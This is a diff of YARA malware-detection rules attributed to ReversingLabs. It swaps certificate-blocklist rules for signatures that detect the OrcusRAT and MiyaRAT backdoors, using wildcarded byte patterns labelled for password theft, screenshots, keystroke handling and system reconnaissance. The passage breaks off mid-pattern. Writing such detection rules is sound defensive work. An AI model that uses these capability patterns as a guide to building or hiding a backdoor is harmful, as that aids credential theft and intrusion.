+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "OrcusRAT"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Karim Lammali" and pe.signatures [ i ] . serial == "06:47:7e:34:25:f1:44:89:95:ce:d5:39:78:9e:68:42" and 1334275199 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_0450A7C1C36951Da09C8Ad0E7F716Ff2 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "b4a56bbe-f2ba-52df-832d-35b92ab73683"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L549-L565"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "cb594607ceef1b8d79145ad3905fb2c38d2ed3f3e6c8a0a793fc2dc9d0a21855"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$get_tcp_connections = {
+            18 0B 16 0C 7E ?? ?? ?? ?? 12 ?? 17 07 1B 16 28 ?? ?? ?? ?? 0D 09 2C ?? 09 1F ?? 2E
+            ?? 72 ?? ?? ?? ?? 09 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 08 28 ?? ?? ??
+            ?? 13 ?? 11 ?? 12 ?? 17 07 1B 16 28 ?? ?? ?? ?? 0D 09 2C ?? 72 ?? ?? ?? ?? 09 8C ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 11 ?? D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? A5 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 8C ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 6A 58 28 ?? ?? ?? ?? 13 ?? 11 ?? 7B ?? ?? ?? ?? 8D ?? ?? ?? ?? 0A
+            16 13 ?? 2B ?? 11 ?? D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? A5 ?? ?? ?? ?? 13
+            ?? 06 11 ?? 11 ?? A4 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 8C ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 6A 58 28 ?? ?? ?? ?? 13 ?? 11 ?? 17 58 13 ?? 11 ?? 6A 11 ?? 7B ?? ?? ?? ?? 6E
+            32 ?? DE ?? 11 ?? 28 ?? ?? ?? ?? DC 06 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? (FE | 06)
+            ?? ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28
+        }
+		$get_operating_system_information_p1 = {
+            73 ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 0B 12 ?? (FE | 16) ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 0A 28 ?? ?? ?? ?? 0C 08 45 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 2B ??
+            06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2B ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2B ?? 06 72
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 2B ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 0D
+            09 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 09 (FE | 06) ??
+            ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 72 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 39 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 2F ?? 06 1C 8D ?? ?? ?? ??
+            25 16 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25
+            18 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 25 1A
+            11 ?? 8C ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 38 ??
+            ?? ?? ?? 06 1C 8D ?? ?? ?? ?? 25 16 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F
+        }
+		$get_operating_system_information_p2 = {
+            A2 25 17 72 ?? ?? ?? ?? A2 25 18 11 ?? 8C ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 25
+            1A 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 28 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 2B ?? 06 1A 8D ?? ?? ?? ?? 25 16 09 7B ?? ?? ?? ?? 72 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 09 7B ?? ?? ?? ?? 72 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26
+            06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 06 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 39 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 13 ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 33 ?? 06 72 ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 38 ?? ?? ?? ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 33 ?? 06 72 ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 38 ?? ?? ?? ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 33 ?? 06 6F ?? ?? ?? ?? 72
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 38 ?? ?? ?? ?? 06
+            6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 39 ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 2B ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 33 ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 2B ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 2E ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 33
+            ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2B ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 2E ?? 11
+            ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 2E ?? 06 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            2C ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 06 72
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 09 7B ?? ?? ?? ?? 2C ?? 09 7B ?? ?? ?? ?? 6F ?? ??
+            ?? ?? DC 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 73 ?? ?? ?? ?? 13 ?? 11
+        }
+		$take_screenshot = {
+            28 ?? ?? ?? ?? 0B 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 12 ?? 28 ?? ?? ?? ?? 73 ??
+            ?? ?? ?? 0A 06 28 ?? ?? ?? ?? 0C 08 28 ?? ?? ?? ?? 0B 12 ?? 28 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 0B 12 ?? 28 ?? ?? ?? ?? 16 16 06 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            DE ?? 08 2C ?? 08 6F ?? ?? ?? ?? DC 06
+        }
+		$get_passwords = {
+            1F ?? 8D ?? ?? ?? ?? 25 16 73 ?? ?? ?? ?? A2 25 17 73 ?? ?? ?? ?? A2 25 18 73 ?? ??
+            ?? ?? A2 25 19 73 ?? ?? ?? ?? A2 25 1A 73 ?? ?? ?? ?? A2 25 1B 73 ?? ?? ?? ?? A2 25
+            1C 73 ?? ?? ?? ?? A2 25 1D 73 ?? ?? ?? ?? A2 25 1E 73 ?? ?? ?? ?? A2 25 1F ?? 73 ??
+            ?? ?? ?? A2 25 1F ?? 73 ?? ?? ?? ?? A2 25 1F ?? 73 ?? ?? ?? ?? A2 0A 73 ?? ?? ?? ??
+            25 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 06 0C 16 0D 2B
+            ?? 08 09 9A 13 ?? 07 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE
+            ?? 09 17 58 0D 09 08 8E 69 32 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ??
+            2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 11 ?? 6F ??
+            ?? ?? ?? 16 31 ?? 07 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 12 ?? 28 ??
+            ?? ?? ?? 2D ?? DE ?? 12 ?? (FE | 16) ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 02 39 ?? ?? ??
+            ?? 06 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 07 6F ??
+            ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D
+            ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 13 ?? 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ??
+            11 ?? 6F ?? ?? ?? ?? 16 31 ?? 07 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? DE ?? 26 DE ??
+            12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? (FE | 16) ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 07
+        }
+		$process_key_action = {
+            03 28 ?? ?? ?? ?? 2C ?? 02 17 7D ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 02 7B ?? ?? ?? ?? 1A
+            8D ?? ?? ?? ?? 25 16 03 8C ?? ?? ?? ?? A2 25 17 04 8C ?? ?? ?? ?? A2 25 18 05 8C ??
+            ?? ?? ?? A2 25 19 07 A2 6F ?? ?? ?? ?? 26 2A 02 7B ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ??
+            0C 02 17 7D ?? ?? ?? ?? 02 16 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 1A 8D ?? ?? ?? ?? 25
+            16 03 8C ?? ?? ?? ?? A2 25 17 04 8C ?? ?? ?? ?? A2 25 18 05 8C ?? ?? ?? ?? A2 25 19
+            08 A2 6F ?? ?? ?? ?? 26 2A 02 7B ?? ?? ?? ?? 39 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 0D 2B ?? 09 6F ?? ?? ?? ?? 74 ?? ?? ?? ?? 13 ?? 02 11 ?? 16 9A A5 ?? ?? ??
+            ?? 11 ?? 17 9A A5 ?? ?? ?? ?? 11 ?? 18 9A A5 ?? ?? ?? ?? 11 ?? 19 9A 74 ?? ?? ?? ??
+            28 ?? ?? ?? ?? 11 ?? 16 9A A5 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 03 04 11 ?? 19 9A 74
+            ?? ?? ?? ?? 18 73 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 26 09 6F ?? ?? ?? ?? 2D ?? DE ?? 09
+            75 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 02 7B ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 0A 02 03 04 05 06 28
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PS Partnership" and pe.signatures [ i ] . serial == "04:50:a7:c1:c3:69:51:da:09:c8:ad:0e:7f:71:6f:f2" and 1362182399 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $get_tcp_connections ) or ( all of ( $get_operating_system_information_p* ) ) or ( $take_screenshot ) or ( $get_passwords ) or ( $process_key_action ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0F9Fbdab9B39645Cf3211F87Abb5Ddb7 : INFO FILE
+rule REVERSINGLABS_Win64_Backdoor_Miyarat : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects MiyaRAT backdoor."
 		author = "ReversingLabs"
-		id = "ad24d2e9-ae3d-5fae-b58d-965bd1de2a99"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "1c5ae79a-9760-5622-909c-76bb47721ed4"
+		date = "2025-02-27"
+		modified = "2025-02-27"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L567-L583"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ba5885c7769b5ead261815880033b0df50dc4f7684fdb37398ab01bfebda0e37"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/backdoor/Win64.Backdoor.MiyaRAT.yara#L1-L264"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a06deed11a7bdaa17b4cb69da1bd66ff2f2072af8cf4081f7481a51e4567135d"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "MiyaRAT"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "The Motivo Group, Inc." and pe.signatures [ i ] . serial == "0f:9f:bd:ab:9b:39:64:5c:f3:21:1f:87:ab:b5:dd:b7" and 1361318399 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_4211D2E4F0E87127319302C55B85Bcf2 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "dbe2a945-cf13-564a-a95a-24534c70a723"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L585-L601"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "edf9bbface7fe943dfa4f5a6e8469802ccdbd3de9d3e6b8fabebb024c21bb9a9"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$get_disk_information_p1 = {
+            48 8B C4 48 89 58 ?? 48 89 70 ?? 57 41 54 41 55 41 56 41 57 48 81 EC ?? ?? ?? ?? 0F
+            29 70 ?? 0F 29 78 ?? 44 0F 29 40 ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ??
+            ?? ?? 48 8B D9 48 89 8C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 45 33 ED 45 8B E5 44
+            89 6C 24 ?? FF 15 ?? ?? ?? ?? 8B F0 89 84 24 ?? ?? ?? ?? 0F 57 C0 0F 11 84 24 ?? ??
+            ?? ?? 0F 57 C9 F3 0F 7F 8C 24 ?? ?? ?? ?? 45 33 C0 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 85 F6 75 ?? 0F 57 C0 0F 11 03 4C 89 6B ?? 4C 89 6B ??
+            41 B8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 90 48 8B 94 24 ?? ??
+            ?? ?? 48 83 FA ?? 0F 86 ?? ?? ?? ?? 48 FF C2 48 8B 8C 24 ?? ?? ?? ?? 48 8B C1 48 81
+            FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? B0 ?? 48 BF ?? ?? ?? ?? ?? ?? ?? ?? F2 44
+            0F 10 05 ?? ?? ?? ?? 88 44 24 ?? 3C ?? 0F 8F ?? ?? ?? ?? 0F BE D0 8D 4A ?? 0F B6 C1
+            0F A3 C6 0F 83 ?? ?? ?? ?? 0F 57 C0 0F 11 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7
+            44 24 ?? ?? ?? ?? ?? 0F B6 C2 88 44 24 ?? C6 44 24 ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 15
+            ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 0F 57 C0 0F 11 84 24 ?? ?? ?? ?? 4C 89 AC
+            24 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 0F 10 00 0F 11 84 24 ?? ?? ?? ?? 0F 10 48 ??
+            0F 11 8C 24 ?? ?? ?? ?? 4C 89 68 ?? 48 C7 40 ?? ?? ?? ?? ?? C6 00 ?? 41 83 CC ?? 44
+            89 64 24 ?? 48 8B 54 24 ?? 48 83 FA ?? 76 ?? 48 FF C2 48 8B 4C 24 ?? 48 8B C1 48 81
+            FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 6C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C6 44 24
+        }
+		$get_disk_information_p2 = {
+            48 8D 8C 24 ?? ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 48 0F 47 8C 24 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? 8B D8 48 8D 8C 24 ?? ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 48 0F 47 8C 24
+            ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 83 BC 24 ?? ??
+            ?? ?? ?? 48 0F 47 8C 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ??
+            48 89 44 24 ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 84 24 ?? ?? ?? ?? 48 89
+            44 24 ?? 4C 8D 8C 24 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 0F 57 FF 48 85 C9 78 ?? F2
+            48 0F 2A F9 EB ?? 48 8B C1 48 D1 E8 83 E1 ?? 48 0B C1 F2 48 0F 2A F8 F2 0F 58 FF F2
+            41 0F 59 F8 48 8B 8C 24 ?? ?? ?? ?? 0F 57 F6 48 85 C9 78 ?? F2 48 0F 2A F1 EB ?? 48
+            8B C1 48 D1 E8 83 E1 ?? 48 0B C1 F2 48 0F 2A F0 F2 0F 58 F6 F2 41 0F 59 F0 33 D2 41
+            B8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 90 4C 8D 8C 24 ?? ?? ?? ?? 49 FF C9 B8 ?? ?? ?? ?? F7 E3 C1 EA ?? 0F B6 C2
+            C0 E0 ?? 8D 0C 10 02 C9 2A D9 80 C3 ?? 41 88 19 8B DA 85 D2 75 ?? 4C 8D 84 24 ?? ??
+            ?? ?? 49 8B D1 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 83 CC ?? 44 89 64 24 ?? 48
+        }
+		$get_disk_information_p3 = {
+            8B B4 24 ?? ?? ?? ?? 48 8B C7 48 2B C6 48 83 F8 ?? 0F 82 ?? ?? ?? ?? 4C 8D BC 24 ??
+            ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 4C 0F 47 BC 24 ?? ?? ?? ?? 0F 57 C0 0F 11 84 24
+            ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 4C 8D 76 ?? BF ?? ?? ??
+            ?? 48 8D 9C 24 ?? ?? ?? ?? 4C 3B F7 0F 86 ?? ?? ?? ?? 49 8B FE 48 83 CF ?? 48 B8 ??
+            ?? ?? ?? ?? ?? ?? ?? 48 3B F8 76 ?? 48 8B F8 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 83 C0
+            ?? 48 8B C8 E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 58 ?? 48 83 E3 ?? 48 89
+            43 ?? EB ?? 48 83 FF ?? B8 ?? ?? ?? ?? 48 0F 42 F8 48 8D 4F ?? 48 85 C9 75 ?? 49 8B
+            DD EB ?? 48 81 F9 ?? ?? ?? ?? 72 ?? 48 8D 41 ?? 48 3B C1 0F 86 ?? ?? ?? ?? EB ?? E8
+            ?? ?? ?? ?? 48 8B D8 48 89 9C 24 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? 48 89 BC 24 ??
+            ?? ?? ?? 4C 8B C6 49 8B D7 48 8B CB E8 ?? ?? ?? ?? 66 C7 04 33 ?? ?? 42 C6 04 33 ??
+            41 83 CC ?? 44 89 64 24 ?? 4C 8D 8C 24 ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 48 8D 8C
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 0F BA EC ?? 44 89 64 24 ?? 41 B8 ?? ?? ?? ?? 48 8D
+            15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 57 C0 0F 11 44 24 ?? 4C 89
+            6C 24 ?? 4C 89 AC 24 ?? ?? ?? ?? 0F 10 00 0F 11 44 24 ?? 0F 10 48 ?? 0F 11 4C 24 ??
+            4C 89 68 ?? 48 C7 40 ?? ?? ?? ?? ?? C6 00 ?? 41 0F BA EC ?? 44 89 64 24 ?? 48 8D 84
+            24 ?? ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ?? 49 FF C0 42 80 3C 00
+        }
+		$get_disk_information_p4 = {
+            75 ?? 48 8D 94 24 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 0F 57 C0 0F 11 84 24 ??
+            ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 0F 10 00 0F 11 84 24 ?? ??
+            ?? ?? 0F 10 48 ?? 0F 11 8C 24 ?? ?? ?? ?? 4C 89 68 ?? 48 C7 40 ?? ?? ?? ?? ?? C6 00
+            ?? 41 0F BA EC ?? 44 89 64 24 ?? 41 B8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 57 C0 0F 11 44 24 ?? 4C 89 6C 24 ?? 4C 89 6C 24 ?? 0F
+            10 00 0F 11 44 24 ?? 0F 10 48 ?? 0F 11 4C 24 ?? 4C 89 68 ?? 48 C7 40 ?? ?? ?? ?? ??
+            C6 00 ?? 41 83 CC ?? 44 89 64 24 ?? 48 8D 54 24 ?? 48 83 7C 24 ?? ?? 48 0F 47 54 24
+            ?? 4C 8B 44 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 54 24 ?? 48 83 FA
+            ?? 76 ?? 48 FF C2 48 8B 4C 24 ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48
+            8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 6C
+            24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 83 FA ??
+            76 ?? 48 FF C2 48 8B 8C 24 ?? ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2
+            ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C
+            89 AC 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48
+            8B 94 24 ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF C2 48 8B 4C 24 ?? 48 8B C1 48 81 FA ??
+            ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 4C 89 6C 24 ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 44 24 ??
+            ?? 48 8B 94 24 ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF C2 48 8B 8C 24 ?? ?? ?? ?? 48 8B
+        }
+		$get_disk_information_p5 = {
+            C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8
+            ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ??
+            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF
+            C2 48 8B 8C 24 ?? ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49
+            ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 94 24
+            ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF C2 48 8B 8C 24 ?? ?? ?? ?? 48 8B C1 48 81 FA ??
+            ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ??
